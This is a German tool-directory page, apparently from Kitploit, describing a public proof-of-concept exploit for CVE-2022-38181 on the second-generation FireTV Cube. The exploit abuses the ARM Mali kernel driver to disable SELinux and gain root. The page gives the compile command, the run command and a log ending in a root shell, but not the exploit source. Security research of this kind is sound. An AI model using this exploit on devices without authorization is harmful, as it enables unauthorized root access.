Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE_2022_38181_Raven — CVE-2022-38181 POC für FireTV 2. Generation Cube (raven) | Kitploit
Tools/GitHubGitHub/pro-me3us/cve_2022_38181_raven
Android-SicherheitEmbedded-System-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationBinary-Exploitation
GitHubpro-me3us/cve_2022_38181_raven

CVE_2022_38181_Raven

CVE-2022-38181 POC für FireTV 2. Generation Cube (raven)

Repository anzeigen
794vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit für CVE-2022-38181 für FireTV Cube der 2. Generation

Dies ist ein Fork des Pixel 6 POC des Sicherheitsforschers Man Yue Mo für CVE_2022_38181. Seine ausführliche Analyse der Schwachstelle finden Sie hier. Es wurden Änderungen vorgenommen, um den 32-Bit-Userspace von FireOS sowie die älteren Bifrost-Treiber (r16p0) und die Linux-Kernel-Version (4.9.113) des Cube der 2. Generation zu berücksichtigen. Der POC nutzt einen Bug im ARM-Mali-Kerneltreiber aus, um beliebige Codeausführung im Kernel zu erlangen, die anschließend dazu verwendet wird, SELinux zu deaktivieren und Root-Rechte zu erlangen.

Ich habe den folgenden Befehl verwendet, um mit clang in ndk-21 zu kompilieren:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker

Der Exploit sollte 30–90 Sekunden nach dem Booten des Cube ausgeführt werden, um die größte Zuverlässigkeit zu erzielen.

root@kitploit:~
raven:/ $ /data/local/tmp/raven_shrinker
fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys
failed, retry.
failed, retry.
failed, retry.
failed, retry.
region freed 80
alias gpu va 100c85000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 2 0
Found freed_idx 2
Found pgd 23, 100cce000
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001c4 1c4
overwrite addr : 1043001c4 1c4
result 50
raven:/ # 
Tool herunterladen